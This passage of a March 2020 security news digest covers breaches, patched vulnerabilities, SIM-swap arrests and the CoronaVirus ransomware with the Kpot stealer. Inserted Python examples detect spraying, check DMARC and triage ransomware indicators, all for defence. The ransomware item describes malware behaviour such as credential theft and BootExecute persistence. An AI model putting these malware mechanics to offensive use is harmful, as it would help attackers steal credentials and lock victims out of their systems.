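            for e in events if e["result"] == "OK" and e["mfa"] == "no"]


def review(lines):
    events = parse(lines)
    return {"spraying": find_spraying(events),
            "no_mfa": find_logins_without_mfa(events)}


if __name__ == "__main__":
    for kind, items in review(SAMPLE_LOG).items():
        for item in items:
            print(kind, item)
```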

As part of its teleworking guidance, CISA also advises organizations to review DHS documentation on how to secure network infrastructure devices, avoid social engineering and phishing attacks, choose and protect passwords and supplement passwords, as well as the National Institute of Standards and Technology (NIST) guide to enterprise telework and BYOD security.

The DHS cybersecurity agency previously warned orgs to patch Pulse Secure VPN servers against ongoing attacks trying to exploit a known remote code execution (RCE) vulnerability tracked as CVE-2019-11510.

One week later, the FBI said in a flash security alert that state-backed hackers have breached the networks of a US financial entity and a US municipal government after exploiting servers left vulnerable to CVE-2019-11510 exploits.

Unpatched Pulse Secure VPN servers remain an attractive target for malicious actors. @CISAgov released an Alert on continued exploitation of CVE-2019-11510 in Pulse Secure. Update ASAP! https://t.co/n7mx9juifv #Cyber #Cybersecurity #InfoSec

— US-CERT (@USCERT_gov) January 10, 2020
CISA also published information on how to defend against scammers who use the Coronavirus Disease 2019 (COVID-19) health crisis as bait to push their scams over the Internet.

The World Health Organization (WHO) and the U.S. Federal Trade Commission (FTC) issued warnings about ongoing Coronavirus-themed phishing attacks and scam campaigns in February.

Microsoft, Google, LogMeIn, and Cisco have also announced last week that they are offering free licenses for their meeting, collaboration, and remote work tools so that teleworkers can join virtual meetings and chat with colleagues while working remotely.


Microsoft Unveils New Windows 10 Automatic Driver Update Plan
15.3.2020 
Bleepingcomputer  OS

Microsoft has unveiled a new plan for the delivery of automatic driver updates that they hope will reduce the number of reliability issues users experience in Windows 10.

When a hardware driver is marked as automatic, Microsoft will automatically download and install the driver in Windows 10.

Marking drivers as automatic
Pushing out a new driver to a large Windows 10 population, though, can cause reliability issues, hardware conflicts, or bugs to appear as they begin to be used within a much larger user base.

To resolve these types of issues, this month Microsoft will use a new automatic driver update plan that performs gradual rollouts of new drivers to a small group of programmatically chosen users before slowly releasing the driver to the rest of the Windows 10 population.

This initial population will be made up of Windows 10 devices that are highly active so that there is a higher chance that Microsoft will receive diagnostic data about the quality of the driver and if it is causing any issues.

"The initial set is programmatically selected and is typically both highly active and representative of targeted clusters of hardware ID (HWID) and computer hardware ID (CHID) combinations for the particular driver. The initial rollout targets highly active devices as there is a higher chance of getting diagnostic data from these devices, which enables early failure detection," Microsoft explains.

Microsoft says this initial rollout stage will take approximately 8 days and the rest of the rollout can continue up to 30 days as they gradually increase its availability and the collection of diagnostic data.

This timeframe, though, can vary between drivers depending on whether the driver has been assessed as a low or high-risk driver, as seen in the graph below.

Gradual Rollout Graph
Once satisfactory data has been analyzed and determined to meet the required thresholds for what is considered a successful rollout, the driver will be made available to 100% of the users for install via Windows Update.


Europol Dismantles SIM Swap Criminal Groups That Stole Millions
15.3.2020 
Bleepingcomputer  CyberCrime  Mobil 

Europol arrested suspected members of two SIM swapping criminal groups in collaboration with local law enforcement agencies from Spain, Austria, and Romania following two recent investigations.

SIM swap fraud (also known as SIM hijacking) happens when a scammer takes control over a target's phone number via social engineering or by bribing mobile phone operator employees to port the number to a SIM controlled by the fraudster.

Subsequently, the attacker will receive all messages and calls delivered to the victim onto his own phone, thus being able to bypass SMS-based multi-factor authentication (MFA) by gaining access to one-time password (OTP) codes, to steal credentials, and to take control of online service accounts.

Successful SIM hijacking attacks allow criminals to log in to their victims' bank accounts and steal money, take over their email or social media accounts, as well as change account passwords and lock victims out of their accounts.

"Fraudsters are always coming up with new ways to steal money from the accounts of unsuspecting victims," acting Head of Europol’s European Cybercrime Centre Fernando Ruiz said.

"Although seemingly innocuous, SIM swapping robs victims of more than just their phones: SIM hijackers can empty your bank account in a matter of hours," he added. "Law enforcement is gearing up against this threat, with coordinated actions happening across Europe."

Millions of euros stolen from victims
Twelve individuals suspected to be part of a hacking ring which was able to steal more than €3 million in several SIM swapping attacks were arrested in Spain by the Spanish National Police (Policía Nacional) in collaboration with Europol and the Civil Guard (Guardia Civil), during 'Operation Quinientos Dusim.'

"Composed of nationals between the ages of 22-52 years old from Italy, Romania, Colombia and Spain, this criminal gang struck over 100 times, stealing between €6,000 and €137,000 from bank accounts of unsuspecting victims per attack," Europol said.

"The criminals managed to obtain the online banking credentials from the victims of the different banks by means of hacking techniques such as the use of banking Trojans or other types of malware. Once they had these credentials, the suspects would apply for a duplicate of the SIM cards of the victims, providing fake documents to the mobile service providers.

"With these duplicates in their possession, they would receive directly to their phones the second-factor authentication codes the banks would send to confirm transfers."

As Europol explains, once they gained access to their victims' bank accounts, the suspects made transfers to mule accounts within a time frame of two hours so that their victims weren't able to realize that something was wrong with their phones.

SIM swapping
Image: Europol
Another 14 members of a SIM hijacking gang were also arrested as part of 'Operation Smart Cash' following an investigation led by the Romanian National Police (Poliția Română) and the Austrian Criminal Intelligence Service (Bundeskriminalamt), in collaboration with Europol.

"The thefts, which netted dozens of victims in Austria, were perpetrated by the gang in the spring of 2019 in a series of SIM swapping attacks," Europol said.

"Once having gained control over a victim’s phone number, this particular gang would then use stolen banking credentials to log onto a mobile banking application to generate a withdraw transaction which they then validated with a one-time password sent by the bank via SMS allowing them to withdraw money at cardless ATMs."

This crime group was able to steal more than €500,000 from dozens of Austrians during the spring of 2019 until they were arrested at their homes in Romania during early February.

Defending against SIM swapping attacks
Europol also shared measures you can take if you want to prevent SIM hijackers from stealing your credentials and locking you out of your accounts.

To make sure that SIM swapping doesn't affect you, Europol recommends the following:

• Keep your devices’ software up to date
• Do not click on links or download attachments that come with unexpected emails
• Do not reply to suspicious emails or engage over the phone with callers that request your personal information
• Limit the amount of personal data you share online
• Try to use two-factor authentication for your online services, rather than having an authentication code sent over SMS
• When possible, do not associate your phone number with sensitive online accounts
• Set up your own PIN to restrict access to the SIM card. Do not share this PIN with anyone.

If you lose mobile connectivity where you normally have no issues, you should immediately contact your provider and the bank if you spot any suspicious activity on your bank account.

Depending on what your mobile provider says, you might have to quickly change passwords for your online accounts to avoid further compromise in case scammers got your SIM ported to an attacker-controlled device.

The Federal Bureau of Investigation (FBI) also issued a SIM swapping alert last year with guidance on defending against such attacks after observing an increase in the number of SIM jacking attacks.

The FTC provides detailed info on how to secure personal information on your phone and on how to keep personal information secure online.


VMWare Releases Fix for Critical Guest-to-Host Vulnerability
15.3.2020 
Bleepingcomputer  Vulnerebility

A security update has been released that fixes a Critical vulnerability in VMware Workstation Pro that could allow an application running in a guest environment to execute a command on the host.

This vulnerability is in the Windows vmnetdhcp service, which is used to assign IP addresses to the guest via DHCP.

According to a VMware advisory, this vulnerability could allow attackers to perform a denial-of-service attack or execute commands on the Windows host.

"Successful exploitation of this issue may lead to code execution on the host from the guest or may allow attackers to create a denial-of-service condition of the vmnetdhcp service running on the host machine."

This could allow a malicious program, such as malware, to utilize the vulnerability to escape from the guest and take full control over the host PC.

While no known exploit exists at this point, as shown by Microsoft's recent SMBv3 vulnerability, researchers and attackers are known to quickly analyze and create proof-of-concept exploits once a vulnerability is announced.

Due to the critical nature of this vulnerability, it is strongly advised that users upgrade VMware Workstation as soon as possible.

The list of affected products is:

VMware Workstation Pro / Player (Workstation)
VMware Fusion Pro / Fusion (Fusion)
VMware Horizon Client for Windows
VMware Remote Console for Windows (VMRC for Windows)
To resolve this vulnerability, VMware Workstation users should upgrade to version 15.5.2.


PornHub Helps Italians Stay Indoors with Free Premium Access
15.3.2020 
Bleepingcomputer  IT

To help ease the boredom and isolation caused by a country-wide coronavirus lockdown in Italy, PornHub is offering a helping hand by providing Italians free access to their premium service.

On March 10th, 2020, Italy began a nationwide Coronavirus lockdown to help prevent the community spread of the virus. As part of this lockdown, Italians are requested to stay indoors, a 6 PM curfew is being enforced, and people should only travel if necessary.

To offer some entertainment for those stuck indoors, PornHub has announced that they are donating their March proceeds from ModelHub to Italy and that Italians can get free Premium access through March.

"Pornhub is donating its March proceeds from Modelhub to support Italy during this unfortunate time (model earnings will remain untouched). Italy will also have free access to Pornhub Premium throughout the month. Forza Italia, we love you!"

Users in Italy can sign up for free premium access by going to pornhub.com/free-italy.

Free PornHub Premium offer to Italy
Unfortunately, this outbreak will most likely last far longer than March and with Italy getting hit so hard with this virus, it is hoped that PornHub and other streaming services will continue to offer free services to the country.


WordPress Plugin Bug Allows Malicious Code Injection on 100K Sites
15.3.2020 
Bleepingcomputer  Virus

Vulnerabilities in the Popup Builder WordPress plugin could allow unauthenticated attackers to inject malicious JavaScript code into popups displayed on tens of thousands of websites, to steal information, and to potentially fully take over targeted sites.

Popup Builder enables site owners to create, deploy, and manage customizable popups containing a wide range of content from HTML and JavaScript code to images and videos.

Sygnoos, the plugin's developer, markets it as a tool that can help increase sales and revenue via smart pop-ups used to display ads, subscription requests, discounts, and various other types of promotional content.

Unauthenticated XSS and information disclosure flaws
The security flaws discovered by Defiant QA Engineer Ram Gall affect all versions up to and including Popup Builder 3.63.

"One vulnerability allowed an unauthenticated attacker to inject malicious JavaScript into any published popup, which would then be executed whenever the popup loaded," Gall said.

"Typically, attackers use a vulnerability like this to redirect site visitors to malvertising sites or steal sensitive information from their browsers, though it could also be used for site takeover if an administrator visited or previewed a page containing the infected popup while logged in."

The other bug made it possible for any logged-in user (with permissions as low as a subscriber) to gain access to plugin features, to export newsletter subscribers lists, as well as to export system configuration info with a simple POST request to admin-post.php.

No nonce and permission checks in vulnerable code (Defiant)
Vulnerabilities patched, tens of thousands still exposed
The flaws tracked as CVE-2020-10196 and CVE-2020-10195 allow for unauthenticated stored XSS, configuration disclosure, user data export, and website settings modification.

Sygnoos fixed the security issues with the release of Popup Builder version 3.64.1, one week after Defiant reported the bugs.

Since the fixed Popup Builder release was published, just over 33,000 users have updated the plugin, which still leaves over 66,000 sites with active installations exposed to attacks.

"While we have not detected any malicious activity targeting Popup Builder, the stored XSS vulnerability can have a serious impact on site visitors and potentially even allow site takeover," Gall added.

Since late February, hackers have been actively trying to take over WordPress sites by exploiting plugin vulnerabilities that allow them to plant backdoors and create rogue administrator accounts, with hundreds of thousands of websites exposed to attacks.


Open Exchange Rates Data Breach Affects Users of Well-Known Orgs
15.3.2020 
Bleepingcomputer  Incident

Open Exchange Rates has announced a data breach that exposed the personal information and salted and hashed passwords for customers of its API service.

Open Exchange Rates provides an API that allows organizations to query real-time and historical exchange rates for over 200 world currencies. The service's web site states that their API is used by companies such as Etsy, Shopify, Coinbase, Kickstarter, and more.

In data breach notification emails sent today, Open Exchange Rates explains that while investigating a network misconfiguration that was causing delays in their service, they discovered that an unauthorized user had gained access to their network and a database that included user information.

Open Exchange Rates Data Breach Notification (Source: Twitter)
After further investigation, it was discovered that the hacker had access to their system for almost a month, between February 9th, 2020, and March 2nd, 2020, and that the data was most likely extracted from their systems.

"Upon further examination, we determined that the unauthorised user appeared to have initially gained access on 9 February 2020, and could have gained access to a database in which we store user data. Whilst our investigations are ongoing, we have also found evidence indicating that information contained in this database is likely to have been extracted from our network," the email stated.

The following user information was exposed by this data breach:

The name and email address you registered with;
An encrypted/hashed password used by you to access your account connected with the platform;
IP addresses from which you have registered and/or logged into your account with us;
App IDs (32-character strings used to make requests to our service) associated with your account;
Personal and/or business name and address (if you have provided these);
Country of residence (if provided);
Website address (if provided).
Due to this breach, Open Exchange Rates has disabled the password for all accounts created before March 2nd, 2020 and users should use this link to set a new password.

If the same password is used at other sites, BleepingComputer strongly recommends that the password be changed at those sites as well.

As the customer API keys for the service may have also been exposed, Open Exchange Rates is recommending that all users generate new API IDs to access the service.

"As the App IDs (API keys) connected to your account are also potentially affected, you may also wish to generate new ones to access the service via your account dashboard. We do not have any evidence of these being used to gain access to the API, however they could be used to query exchange rate information from our service using your account."

As this API is used by well-known organizations, Open Exchange Rates is warning that the stolen data could be used in targeted spear-phishing campaigns and users should be suspicious of any email, phone calls, or texts asking to confirm their account information.

It is also recommended that users enable two-factor authentication at all sites where they have an account.


Discord Offers Enhanced Go Live Streaming Due to Coronavirus
15.3.2020 
Bleepingcomputer  IT

Discord has increased the number of people who can join a Go Live streaming session at the same time to aid those affected by the Coronavirus (COVID-19) outbreak.

Discord offers a free private streaming and screen sharing service called Go Live that normally only allows 10 users to connect to a streaming session at once.

Discord Go Live Service
To help those who are quarantined or just feel isolated during the virus outbreak, Discord has raised the limit of their Go Live streaming service from 10 simultaneous users to 50 users at once.

"We wanted to find a way to help, so we’re temporarily upping the limit on Go Live to 50 people at a time, up from 10. Go Live is free to use and lets people privately stream or screen share apps from a computer while others watch on any device — so teachers can conduct a class, co-workers can collaborate, and groups can still meet. You can learn more about how to get started with Go Live here," Discord stated in a blog post.

TechSmith also offering free licenses
TechSmith also announced that they are offering free licenses of their TechSmith Snagit and TechSmith Video Review software through June 30th, 2020.

"Our screen recording tool, TechSmith Snagit, and our asynchronous collaboration platform, TechSmith Video Review, will be provided for free through the end of June 2020 to any organization that needs it," TechSmith announced today.

For existing customers of the TechSmith Relay or Video Review products, TechSmith is providing increased usage at no charge.


Office 365 ATP To Block Email Domains That Fail Authentication
15.3.2020 
Bleepingcomputer  Safety

Microsoft is working on including a new Office 365 Advanced Threat Protection (ATP) feature that would block email sender domains automatically if they fail DMARC authentication as part of an effort to make Office 365 ATP secure by default.

This change was prompted by the fact that, for some custom Office 365 ATP configurations, the default email threat-protection filters might be bypassed and malicious content could inadvertently reach customers' inboxes.

Domain-based Message Authentication, Reporting, and Conformance (DMARC) is an email authentication, policy, and reporting protocol that uses the Sender Policy Framework (SPF) and DomainKeys Identified Mail (DKIM) email authentication methods to validate mail senders.

As Microsoft explains, "DMARC helps receiving mail systems determine what to do with messages sent from your domain that fail SPF or DKIM checks."

Reject emails if sender domain validation fails
"We see lots of cases where configuration of our protection stack has enabled malicious content to be inadvertently delivered to end users," Microsoft explains on the new feature's Microsoft 365 Roadmap entry. "We’re working on a few features that will help address this problem."

As mentioned in the beginning, the newest Office 365 feature planned is the addition of an automated block for email domains that fail authentication.

"The Antispam policy allows administrators to 'Allow' domains regardless of the reputation of the domain," Microsoft adds. "We’re changing our policies to not honor Allow rules when the domain fails authentication."

Admins who want to work around the block can fix the authentication issues for the domains they want to allow, or add new Exchange mail flow rules (also known as transport rules) to allow messages from senders on specific domains despite the newly imposed block designed to boost email security.

Until this new Office 365 ATP feature is rolled out, sometime around April 2020, inbound email that fails DMARC is marked by Office 365 as spam rather than being rejected automatically.
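To make the policy change concrete, the following Python models the DMARC pass/fail decision (SPF or DKIM passing and aligning with the From: domain) and the allow-rule decision before and after the change. It is an added example, not Microsoft's code; SPF and DKIM verification are assumed to have happened already, the organizational-domain logic is a simplification (last two labels instead of the Public Suffix List), and the domains and the Allow list are constructed samples.

```python
"""Model of DMARC identifier alignment plus the Office 365 ATP 'Allow' rule change.

Added example, not Microsoft's code. SPF and DKIM are assumed verified already; only
DMARC alignment and the allow-rule decision are modelled. Sample domains are constructed.
"""
from dataclasses import dataclass
from typing import Iterable, Optional


def organizational_domain(domain: str) -> str:
    """Relaxed alignment compares organizational domains. Real implementations use the
    Public Suffix List; taking the last two labels is a simplification (assumption)."""
    return ".".join(domain.lower().rstrip(".").split(".")[-2:])


def aligned(from_domain: str, auth_domain: Optional[str], strict: bool = False) -> bool:
    """Does the domain SPF/DKIM vouched for align with the From: domain?"""
    if not auth_domain:
        return False
    if strict:
        return from_domain.lower() == auth_domain.lower()
    return organizational_domain(from_domain) == organizational_domain(auth_domain)


@dataclass
class AuthResults:
    from_domain: str            # RFC 5322 From: domain, the identity DMARC protects
    spf_pass: bool
    spf_domain: Optional[str]   # MAIL FROM domain that SPF checked
    dkim_pass: bool
    dkim_domain: Optional[str]  # d= tag of a DKIM signature that verified


def dmarc_pass(r: AuthResults, strict: bool = False) -> bool:
    """DMARC passes when SPF or DKIM passes *and* that identifier aligns with From:."""
    spf_ok = r.spf_pass and aligned(r.from_domain, r.spf_domain, strict)
    dkim_ok = r.dkim_pass and aligned(r.from_domain, r.dkim_domain, strict)
    return spf_ok or dkim_ok


def filter_verdict(r: AuthResults, allowed_domains: Iterable[str],
                   honor_allow_on_auth_failure: bool) -> str:
    """Return 'allow' (Allow rule bypasses filtering), 'filter' (normal anti-spam
    pipeline) or 'spam'. honor_allow_on_auth_failure=True is the behaviour being
    retired; False is the secure-by-default change described above."""
    authenticated = dmarc_pass(r)
    allowed = r.from_domain.lower() in {d.lower() for d in allowed_domains}
    if allowed and (authenticated or honor_allow_on_auth_failure):
        return "allow"      # with True, spoofed mail from an allow-listed domain gets through
    if authenticated:
        return "filter"
    return "spam"           # failing DMARC is marked as spam, not rejected outright


# Constructed samples: partner.example is on the tenant's Allow list.
ALLOW_LIST = ["partner.example"]
LEGIT = AuthResults("partner.example", True, "bounce.partner.example", True, "mail.partner.example")
SPOOFED = AuthResults("partner.example", True, "bulk-sender.test", False, None)
UNKNOWN = AuthResults("other.test", False, None, False, None)
OTHER_OK = AuthResults("other.test", False, None, True, "other.test")

if __name__ == "__main__":
    for label, msg in (("legit", LEGIT), ("spoofed", SPOOFED), ("unknown", UNKNOWN)):
        old = filter_verdict(msg, ALLOW_LIST, honor_allow_on_auth_failure=True)
        new = filter_verdict(msg, ALLOW_LIST, honor_allow_on_auth_failure=False)
        print(f"{label:8s} dmarc={dmarc_pass(msg)!s:5s} old={old:6s} new={new}")
```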

Office 365 fighting attacks (Microsoft)
Part of a larger effort to secure Office 365
This feature is planned to roll out to all environments together with another one designed to also boost the default security of email inboxes protected by Office 365 ATP.

Microsoft is also planning to block malicious content in Office 365 regardless of custom configurations unless manually overridden by admins or users. Once the new features are enabled, Office 365 will honor EOP/ATP malware analysis (detonation) verdicts to block known malicious files and URLs automatically.

In October 2019, Microsoft enabled Authenticated Received Chain (ARC) for all hosted mailboxes to improve anti-spoofing detection and to check authentication results within Office 365. The ARC protocol supplements the DMARC and DKIM email authentication protocols as part of internet mail handlers' efforts to combat email spoofing, especially when dealing with forwarded messages.

Microsoft also warned Office 365 admins and users against bypassing the built-in spam filters in June 2019, in a support document that also shares guidelines for cases when this can't be avoided.

"If you have to set bypassing, you should do this carefully because Microsoft will honor your configuration request and potentially let harmful messages pass through," the support document says. "Additionally, bypassing should be done only on a temporary basis. This is because spam filters can evolve, and verdicts could improve over time."


New CoronaVirus Ransomware Acts as Cover for Kpot Infostealer
15.3.2020 
Bleepingcomputer  Ransomware

A new ransomware called CoronaVirus has been distributed through a fake web site pretending to promote the system optimization software and utilities from WiseCleaner.

With the increasing fears and anxiety of the Coronavirus (COVID-19) outbreak, an attacker has started to build a campaign to distribute a malware cocktail consisting of the CoronaVirus Ransomware and the Kpot information-stealing Trojan.

This new ransomware was discovered by MalwareHunterTeam and after further digging into the source of the file, we have been able to determine how the threat actor plans on distributing the ransomware and possible clues suggesting that it may actually be a wiper.

CoronaVirus Ransomware spread through fake WiseCleaner site
To distribute the malware, the attackers have created a web site that impersonates the legitimate Windows system utility site WiseCleaner.com.

Fake WiseCleaner Site
The downloads on this site are not currently active, but the site has distributed a file called WSHSetup.exe that acts as a downloader for both the CoronaVirus Ransomware and a password-stealing Trojan called Kpot.

When the program is executed, it attempts to download a variety of files from a remote web site. Currently, only file1.exe and file2.exe are available for download, but the installer attempts to download a total of seven files.

Installer downloading malware
The first file downloaded by the installer is 'file1.exe', the Kpot password-stealing Trojan.

When executed, it will attempt to steal cookies and login credentials from web browsers, messaging programs, VPNs, FTP, email accounts, gaming accounts such as Steam and Battle.net, and other services. The malware will also take a screenshot of the active desktop and attempt to steal cryptocurrency wallets stored on the infected computer.

This information is then uploaded to a remote site operated by the attackers.

The second file, file2.exe, is the CoronaVirus Ransomware, which will be used to encrypt the files on the computer.

When encrypting files, it will only target files that contain the following extensions:

.bak, .bat, .doc, .jpg, .jpe, .txt, .tex, .dbf, .xls, .cry, .xml, .vsd, .pdf, .csv, .bmp, .tif, .tax, .gif, .gbr, .png, .mdb, .mdf, .sdf, .dwg, .dxf, .dgn, .stl, .gho, .ppt, .acc, .vpd, .odt, .ods, .rar, .zip, .cpp, .pas, .asm, .rtf, .lic, .avi, .mov, .vbs, .erf, .epf, .mxl, .cfu, .mht, .bak, .old
Encrypted files keep their original extension, but the file name is replaced with the attacker's email address. For example, test.jpg would be encrypted and renamed to 'coronaVi2022@protonmail.ch___1.jpg'.

In some cases, like below, it may prepend the email address multiple times to the file name.

CoronaVirus Encrypted Files
In each folder that is encrypted, and on the desktop, a ransom note named CoronaVirus.txt will be created that demands 0.008 bitcoins (~$50) be sent to the hardcoded bitcoin address bc1qkk6nwhsxvtp2akunhkke3tjcy2wv2zkk00xa3j, which has not received any payments as of yet.

CoronaVirus Ransom Note
The ransomware will also rename the C: drive to CoronaVirus as shown below, which serves no purpose other than the attacker trolling the victims.

Renamed C: Drive to Troll victim
On reboot, the ransomware will show a lock screen displaying the same text as the ransom note before Windows is loaded, as seen below.

CoronaVirus Ransomware MBRLocker component
Head of SentinelLabs Vitali Kremez told BleepingComputer that this is being displayed through a modification of the HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager "BootExecute" Registry value that launches an executable from the %Temp% folder before loading any Windows services on boot.

Modified BootExecute Key
After 45 minutes, the lock screen will switch to a slightly different message. You are still unable to enter any code, though, to get back into the system.

Changed MBRLocker screen
After 15 minutes, it boots back into Windows and upon login will display the CoronaVirus.txt ransom note.

This is a strange ransomware and is still being analyzed for weaknesses.

Based on the low ransom amount, static bitcoin address, and political message, it is strongly suspected that this ransomware is being used more as a cover for the Kpot infection rather than to generate actual ransom payments.

"Donations to the US presidential elections are accepted around the clock."

BleepingComputer's theory is that the ransomware component is being used to distract the user from realizing that the Kpot information-stealing Trojan was also installed to steal passwords, cookies, and cryptocurrency wallets.

Anyone who has been infected with this attack should immediately use another computer to change all of their online passwords as they have now been compromised by the Kpot info-stealer.
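For responders triaging a suspected infection, the following Python turns the indicators described above (the renamed-file pattern, the CoronaVirus.txt note, and the modified BootExecute value) into checks that run over a file listing and an exported registry value. It is an added example, not the ransomware's code and not BleepingComputer's; it assumes repeated email prefixes are concatenated directly and that the stock BootExecute value is 'autocheck autochk *', and all sample paths and values are constructed.

```python
"""Triage helpers for the CoronaVirus ransomware indicators described above.

Added example (not the malware's code, not BleepingComputer's). Works on strings so it
runs offline: feed it a directory listing and the exported BootExecute value.
Assumptions: repeated e-mail prefixes are concatenated directly; the stock
BootExecute REG_MULTI_SZ value is 'autocheck autochk *'. Samples are constructed.
"""
import ntpath
import re
from typing import Dict, Iterable, List

ATTACKER_EMAIL = "coronaVi2022@protonmail.ch"      # from the renamed files shown above
RANSOM_NOTE = "CoronaVirus.txt"
STOCK_BOOTEXECUTE = {"autocheck autochk *"}        # assumed default (see lead-in)

# One or more copies of the e-mail address, '___', a counter, then the kept extension.
ENCRYPTED_NAME = re.compile(
    r"^(?:" + re.escape(ATTACKER_EMAIL) + r")+___(?P<n>\d+)\.(?P<ext>[A-Za-z0-9]+)$"
)


def classify(path: str) -> str:
    """'note', 'encrypted' or 'clean' for one path from a directory listing."""
    name = ntpath.basename(path)                    # ntpath splits on '\\' and '/' anywhere
    if name.lower() == RANSOM_NOTE.lower():
        return "note"
    return "encrypted" if ENCRYPTED_NAME.match(name) else "clean"


def triage_listing(paths: Iterable[str]) -> Dict[str, object]:
    """Summarise a listing: encrypted files, which extensions were hit, note locations."""
    encrypted: List[str] = []
    notes: List[str] = []
    ext_counts: Dict[str, int] = {}
    for p in paths:
        kind = classify(p)
        if kind == "encrypted":
            encrypted.append(p)
            ext = ENCRYPTED_NAME.match(ntpath.basename(p)).group("ext").lower()
            ext_counts[ext] = ext_counts.get(ext, 0) + 1
        elif kind == "note":
            notes.append(ntpath.dirname(p))
    return {"encrypted": encrypted, "notes": notes, "extensions": ext_counts,
            "hit": bool(encrypted) or bool(notes)}


def suspicious_bootexecute(values: Iterable[str]) -> List[str]:
    """Entries of Session Manager\\BootExecute that are not the stock value.
    The lock screen described above is launched from %Temp% through this value, so
    anything beyond 'autocheck autochk *' deserves a look."""
    stock = {s.lower() for s in STOCK_BOOTEXECUTE}
    return [v for v in values if v.strip().lower() not in stock]


# Constructed sample listing and registry value (placeholder executable name).
SAMPLE_LISTING = [
    r"C:\Users\alice\Documents\coronaVi2022@protonmail.ch___1.jpg",
    r"C:\Users\alice\Documents\coronaVi2022@protonmail.ch___2.doc",
    r"C:\Users\alice\Documents\CoronaVirus.txt",
    r"C:\Users\alice\Desktop\CoronaVirus.txt",
    r"C:\Users\alice\Pictures\coronaVi2022@protonmail.chcoronaVi2022@protonmail.ch___3.png",
    r"C:\Users\alice\Documents\report.pdf",
    r"C:\Windows\System32\notepad.exe",
]
SAMPLE_BOOTEXECUTE = ["autocheck autochk *",
                      r"C:\Users\alice\AppData\Local\Temp\PLACEHOLDER_LOCKER.exe"]

if __name__ == "__main__":
    summary = triage_listing(SAMPLE_LISTING)
    print("encrypted:", len(summary["encrypted"]), "by extension:", summary["extensions"])
    print("ransom notes in:", summary["notes"])
    print("non-stock BootExecute entries:", suspicious_bootexecute(SAMPLE_BOOTEXECUTE))
```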


Microsoft Releases KB4551762 Security Update for SMBv3 Vulnerability
15.3.2020 
Bleepingcomputer  OS

Microsoft released the KB4551762 security update to patch the pre-auth RCE Windows 10 vulnerability found in Microsoft Server Message Block 3.1.1 (SMBv3), two days after details regarding the flaw were leaked as part of the March 2020 Patch Tuesday.

The KB4551762 security update addresses the vulnerability tracked as CVE-2020-0796, "a network communication protocol issue that provides shared access to files, printers, and serial ports," according to Microsoft.

KB4551762 can be installed by checking for updates via Windows Update or by manually downloading it for your Windows version from the Microsoft Update Catalog.

"While we have not observed an attack exploiting this vulnerability, we recommend that you apply this update to your affected devices with priority," Microsoft says.

The vulnerability, dubbed SMBGhost or EternalDarkness, only impacts devices running Windows 10, versions 1903 and 1909, and Windows Server, Server Core installations, versions 1903 and 1909.

Microsoft explained that the vulnerability only exists in a new feature added to Windows 10 version 1903 and that older versions of Windows do not offer support for SMBv3.1.1 compression, the feature behind this bug.

Confirmed Microsoft pushing KB4551762 OOB security update out to affected systems through Windows Update
SMBv3 RCE vulnerability
Microsoft shared details on CVE-2020-0796 only after security vendors that are part of the Microsoft Active Protections Program, and thus got early access to the flaw's details, released information during the March 2020 Patch Tuesday.

At the time, Microsoft published an advisory with more info on the leaked bug and mitigation designed to block potential attacks after news of a wormable pre-auth RCE vulnerability affecting SMBv3 spread.

"Microsoft is aware of a remote code execution vulnerability in the way that the Microsoft Server Message Block 3.1.1 (SMBv3) protocol handles certain requests," the advisory reads. "An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target SMB Server or SMB Client."

"To exploit the vulnerability against an SMB Server, an unauthenticated attacker could send a specially crafted packet to a targeted SMBv3 Server. To exploit the vulnerability against an SMB Client, an unauthenticated attacker would need to configure a malicious SMBv3 Server and convince a user to connect to it."

DoS and LPE proof-of-concepts demoed by researchers
Researchers at cybersecurity firm Kryptos Logic discovered 48,000 Windows 10 hosts vulnerable to attacks targeting the CVE-2020-0796 vulnerability and also shared a demo video of a denial-of-service proof-of-concept exploit created by security researcher Marcus Hutchins.

SophosLabs' Offensive Research team also developed and shared a video demo of a local privilege escalation proof-of-concept exploit that allows attackers with low-level privileges to gain SYSTEM-level privileges.

"The SMB bug appears trivial to identify, even without the presence of a patch to analyze," Kryptos Logic said, which suggests that malicious actors are probably also close to developing their own exploits for CVE-2020-0796.

For admins who cannot apply the security update at the moment, Microsoft provides mitigation measures for SMB servers and recommends disabling SMBv3 compression using this PowerShell command (no restart required; it does not protect SMB clients from exploitation):

Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" DisableCompression -Type DWORD -Value 1 -Force
Enterprise customers are also advised to block TCP port 445 at the enterprise perimeter firewall to prevent attacks on SMB servers attempting to exploit the flaw.

While malicious scans for vulnerable Windows 10 systems haven't been detected so far, attacks targeting unpatched devices are likely close, seeing that PoC exploits have already been developed and that the bug is easy to analyze.


Hackers Get $1.6 Million for Card Data from Breached Online Shops
15.3.2020 
Bleepingcomputer  Incident

Hackers have collected $1.6 million from selling more than 239,000 payment card records on the dark web. The batch was assembled from thousands of online shops that last year ran a tainted version of Volusion e-commerce software.

The compromise was discovered in October 2019 by Check Point security researcher Marcel Afrahim and affected stores hosted on the Volusion cloud platform.

Wide-scope operation
This was a web-skimming incident, where attackers use malicious JavaScript that steals payment data when customers provide it at checkout.

In this case, the hackers modified a resource used on Volusion-based stores for navigating the UI menu. This resource loaded the skimmer from an external path.

Evidence found by Trend Micro indicates that the attack started on September 7 and is the work of FIN6.

RiskIQ refers to them as MageCart Group 6 and assesses that it goes only after high-profile targets that ensure a large volume of transactions.

Significant damage
A report from Gemini Advisory today says that whoever compromised the Volusion infrastructure waited until November 2019 to start selling the data on the dark web.

So far, they have offered more than 239,000 payment card records on a single dark web marketplace and made $1.6 million. This data came from hundreds of different merchants.


Gemini determined that the number of compromised stores is as high as 6,589, which is in line with results from a search for sites with the modified Volusion JavaScript.

The researchers estimate that the attackers have up to 20 million records, though, which may trickle onto the dark web for a long time. If true, they could have a potential maximum value of more than $100 million, if prices don’t fall.

“The average CNP [card-not-present] breach affecting small to mid-sized merchants compromises 3,000 records; scaling this figure to the 6,589 merchants using Volusion affected by this breach, the potential number of compromised records is up to nearly 20 million. Given this figure, the maximum profit potential would be as high as $133.89 million USD” - Gemini Advisory

This profit is just an estimate, though. However, even if the hackers make just a tenth of it, the figure is still impressive. Buyers also stand to make significant profits from using the stolen card data, Gemini told BleepingComputer.

As for the domains affected by the attack, almost 5,900 were registered in the U.S., with less than 200 registered in Canada.


Of the 239,000 records already sold on the dark web, 98.97% are for cards issued in the U.S., the researchers found. The next-largest issuer countries each accounted for just several hundred records.


